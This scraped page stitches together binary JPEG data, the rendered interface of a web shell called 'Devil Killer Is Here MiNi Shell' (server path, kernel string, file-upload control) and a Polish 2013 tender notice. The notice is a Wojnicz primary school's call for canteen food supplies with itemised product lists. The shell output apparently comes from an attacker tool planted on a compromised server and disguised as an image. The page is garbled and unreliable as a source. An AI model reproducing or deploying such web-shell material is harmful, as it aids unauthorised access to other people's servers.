JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131203/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131203/496986-N-2013.html

<p class="kh_header"><b>Wojnicz: Dostawa produktów żywnościowych do stołówki przy Szkole Podstawowej 
im. Św. Jana Kantego w Wojniczu ul. Rynek 30 w 2014 roku</b><br>
<b>Numer ogłoszenia: 496986 - 2013; data zamieszczenia: 03.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa w Wojniczu , ul. Rynek 30, 32-830 Wojnicz, woj. małopolskie, tel. 014 6790019, faks 014 6790100.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła Podstawowe w Wojniczu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów żywnościowych do stołówki przy Szkole Podstawowej 
im. Św. Jana Kantego w Wojniczu ul. Rynek 30 w 2014 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów żywnościowych do stołówki szkolnej przy Szkole Podstawowej im. Św. Jana Kantego w Wojniczu ul. Rynek 30 w 2014 roku.
Szczegółowy opis przedmiotu zamówienia znajduje się w formularzu asortymentowo-cenowym stanowiącym załącznik nr 4 do SIWZ części 1 do 6.
Przedmiot zamówienia zał. nr 4.dzieli się na 6 odrębnych części:
- część 1. Artykuły spożywcze (różne). Przyprawy. Owoce i warzywa przetworzone.
- część 2. Mięso, drób, przetwory mięsne i wędliny.
- część 3. Warzywa i owoce świeże.  
- część 4. Mleko i produkty mleczarskie. Jaja.
- część 5. Ryby mrożone. Lody. Mrożonki owocowe i warzywne.
- część 6. Pieczywo świeże, wyroby piekarskie i ciastkarskie.
Zamawiający  zastrzega  sobie  prawo  odmówienia  przyjęcia  dostarczonych  towarów,  jeżeli wystąpią jakiekolwiek nieprawidłowości co do jakości, terminu przydatności do spożycia danego produktu, bądź będzie on przewożony w nieodpowiednich warunkach..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.10.00.00-9, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 03.20.00.00-3, 03.10.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące :
1)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
Zamawiający będzie dokonywał oceny spełniania w/w warunków metodą spełnia /nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty,  tj :
a.oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - załącznik nr 2,
b.wpis do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Powiatowej Inspekcji Sanitarnej zgodnie z art. 61 i 62 ust.1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. z 2010 r. nr 136, poz. 914 z późn. zm.) lub decyzję administracyjną o wpisie do rejestru zakładów albo zatwierdzeniu zakładu, wydaną przez Powiatowego Lekarza Weterynarii wraz z nadanym numerem identyfikacyjnym zgodnie z art. 21 ust. 4 ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz.U. z 2006 r. Nr 17, poz. 127 z późn. zm.).
W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 Ustawy Prawo Zamówień Publicznych, Wykonawca załączy do oferty :
1)oświadczenie o braku podstaw do wykluczenia - załącznik nr 3 do SIWZ,
2)aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy;
3)oświadczenie że wykonawca nie zalega z opłacaniem podatków lub oświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu oraz nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub oświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - według wzoru stanowiącego załącznik nr 6 do SIWZ;

Jeżeli  wykonawca  ma  siedzibę  lub  miejsce  zamieszkania  poza  terytorium  Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 2 ust. 1 pkt. 2 - 4 i pkt. 6 rozporządzenia, składa:
1) dokument  lub  dokumenty,  wystawione  w  kraju,  w  którym  ma  siedzibę  lub  miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)  nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2) Jeżeli w miejscu zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w § 2 ust. 1 pkt. 2 - 4 i pkt. 6 rozporządzenia, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio do miejsca zamieszkania lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis § 2 ust. 2 rozporządzenia stosuje się odpowiednio.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania w/w warunków metodą spełnia /nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty,  tj. :
a.oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - załącznik nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania w/w warunków metodą spełnia /nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty,  tj. :
a.oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - załącznik nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania w/w warunków metodą spełnia /nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty,  tj. :
a.oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - załącznik nr 2 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania w/w warunków metodą spełnia /nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty,  tj. :
a.oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - załącznik nr 2 do SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadzcenie potwierdzające, że oferowane artykuły spozywcze są dopuszczone do obrotu na terenie Polski zgodnie z art. 61 i 62 ust. 1 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia (Dz.U. z 2010r. nr 136, poz.914 z późn. zm.) 
Oświadczenie , że osoby które zajmują się dostawą towaru posiadają aktualne badania do celów sanitarno-epidemiologicznych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wojnicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Ekonomiczno- Administracyjny Szkół w Wojniczu, ul. Szkolna 11
32-830 Wojnicz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2013 godzina 08:45, miejsce: Gminny Zespół Ekonomiczno- Administracyjny Szkół w Wojniczu, ul. Szkolna 11; 32-830 Wojnicz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1. Formularz asortymentowo-cenowy
(Kalkulacja cenowa zamówienia)
Artykuły spożywcze (różne).
Przyprawy. Owoce i warzywa przetworzone..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Aromat do ciast 10ml	szt.			120			
2	Wafelek w czekoladzie 52g	szt.			700			
3	Czekolada mleczna 100g	szt.			900			
4	Sól kuchenna jodowana	kg			100			
5	Cynamon 20 g	szt.			20			
6	Cukier wanilinowy 32g	szt.			250			
7	Ryż biały luz	kg			200			
8	Ryż biały długoziarnisty 4 x 100 g	szt.			150			
9	Herbata ekspresowa 300szt.	szt.			40			
10	Rodzynki sułtańskie 100g	szt.			130			
11	Makaron z pszenicy durum 3 kg	szt.			40			
12	Makaron gruby z pszenicy durum 3 kg	szt.			50			
13	Majonez  3l	szt.			70			
14	Pietruszka zielona suszona 150g	szt.			60			
15	Koper suszony 150g	szt.			25			
16	Pieprz czarny mielony  500g	szt.			15			
17	Papryka słodka mielona  800g	szt.			8			
18	Sos do spaghetti Napoli 900ml	szt.			40			
19	Majeranek otarty  150g	szt.			14			
20	Kminek  800g	szt.			15			
21	Ziele angielskie  600g	szt.			12			
22	Liść laurowy  100g	szt.			16			
23	Zioła prowansalskie  300g	szt.			7			
24	Marynata do drobiu  700g	szt.			5			
25	Delikat przyprawa do ryb 600g	szt.			2			
26	Marynata do wieprzowiny  750g	szt.			5			
27	Polewa z owoców leśnych 1200 g	szt.			35			
28	Delikat przyprawa warzywna szefa kuchni 5kg 	szt.			6			
29	Delikat przyprawa w płynie do zup i potraw  860 ml 	szt.			90			
30	Kisiel 1.3 kg 	szt.			30			
31	Cukier biały	kg			450			
32	Cukier puder 400 g	szt.			40			
33	Galaretka  850 g	szt.			50			
34	Sok owocowy 100 % 1 l	szt.			250			
35	Tymianek suszony 300 g	szt.			5			
36	Słonecznik łuskany 100 g	szt.			240			
37	Ciastka Delicje 147 g	szt.			650			
38	Olej rzepakowy z pierwszego tłoczenia 1 l	szt.			600			
39	Kasza manna luz	kg			40			
40	Mąka pszenna Poznańska typ 500	kg			600			
41	Kasza jęczmienna gruba	kg			250			
42	Mąka ziemniaczana 	kg			100			
43	Budyń 1,3 kg 	szt.			30			
44	Goździki 450g 	szt.			2			
45	Koncentrat pomidorowy 30% 800 g 	szt.			100			
46	Chrzan w słoiku 280 g 	szt.			50			
47	Brzoskwinie w puszce 850 ml	szt.			40			
48	Ananas w puszce 565 g	szt.			40			
49	Ogórek konserwowy  900 g	szt.			500			
50	Groszek konserwowy 800 g 	szt.			180			
51	Mięta suszona 300g.	szt.			2			
52	Kukurydza konserwowa 800 g 	szt.			180			
53	Fasolka czerwona konserwowa 800 g 	szt.			120			
54	Liść lubczyku 300g	szt.			10			
55	Owoc jałowca 600g. 	szt.			2			
56	Oregano suszone 230g.	szt.			2			
57	Sos sałatkowy ogrodowy 0,7 kg 	szt.			3			
58	Mleko skondensowane słodkie 530g	szt.			40			
59	Sól morska 	kg			40			
60	Mąka razowa	kg			10			
61	Kasza jaglana 400g	szt.			20			
62	Płatki owsiane 400g	szt.			30			
63	Wafelek przekładany 20g	szt.			400			
64	Wafle przekładane luz	kg			15			
65	Wafle tortowe 170g	szt.			40			
66	Czekoladowe figurki 30g	szt.			250			
67	Biszkopty 120g	szt.			80			
68	Ciastka herbatniki drobne luz	kg			15			
69	Ciastka krakersy 150g	szt.			50			
70	Batony zbożowe 100g	szt.			350			
71	Kawa Inka 150g	szt.			30			
72	Kawa zbożowa 200g	szt.			10			
73	Kakao słodzone 300g	szt.			30			
74	Kakao Deco Morreno 150g	szt.			5			
75	Musztarda 175g.	szt.			40			
76	Nutella 600g	szt.			12			
77	Dżem owocowy 270g	szt.			20			
78	Miód wielokwiatowy 1l 	szt.			30			
79	Szprotki w pomidorach 175g	szt.			40			
80	Płatki kukur. Corn Flakes 1 kg	szt.			10			
81	Zbożowe gwiazdki cynamonowe 1 kg	szt.			6			
82	Zbożowe kulki czekoladowe 1 kg	szt.			5			
83	Zbożowe kółka miodowe 1 kg	szt.			5			
84	Zbożowe muszelki czekoladowe 1 kg	szt.			6			
85	Żurawina suszona 100g.	szt.			50			
86	Ketchup 480g	szt.			8			
87	Orzeszki solone 100g 	szt.			30			
88	Tuńczyk w sosie własnym 185g	szt.			15			
89	Herbatniki maślane luz
	kg
			20
			
90	Curry 900g	szt.			2

			
91	Rosół w kostkach  z kury 700g	szt.			6			
92	Imbir 300g.	szt.			1			
93	Bazylia suszona 230g.	szt.			2			
94	Delikat przyprawa do mięs 600g	szt.			4			
95	Delikat przyprawa do drobiu 600g	szt.			5			
96	Marynata do ryb 700g.	szt.			5			
97	Makaron zacierka 250g	szt.			60			
98	Herbata owocowa ekspresowa 25szt.	szt.			50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2. Formularz asortymentowo-cenowy
(Kalkulacja cenowa zamówienia)
Mięso, drób, przetwory mięsne i wędliny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mięso - łopatka wieprzowa b/k	kg			600
2	Mięso - schab wieprzowy z/k	szt.			150
3	Filet z kurczaka	kg			350
4	Porcje rosołowe	kg			400
5	Mięso gulaszowe
z indyka	kg			250
6	Kiełbasa toruńska	kg			100
7	Kości wieprzowe karkowe	kg			500
8	Kości wieprzowe schabowe	kg			500
9	Boczek surowy	kg			12
10	Filet z indyka - mięso	kg			220
11	Słonina	kg			18
12	Pasztet pieczony	kg			5
13	Parówki wiedeńskie	kg			40
14	Kiełbasa z szynki	kg			20
15
	Wędlina - szynka drobiowa	kg
			15

16	Wędlina - szynka z indyka	kg			15
17	Wędlina - szynka wieprzowa 	kg			12
18	Pasztet w puszce 250g	szt.			10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3. Formularz asortymentowo-cenowy
(Kalkulacja cenowa zamówienia)
Warzywa i owoce świeże, kiszonki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Banany	kg			220
2	Mandarynki	kg			250
3	Jabłka	kg			500
4	Burak ćwikłowy	kg			700
5	Cebula	kg			700
6	Czosnek	kg			20
7	Kalafior	szt.			150
8	Marchew	kg			1500
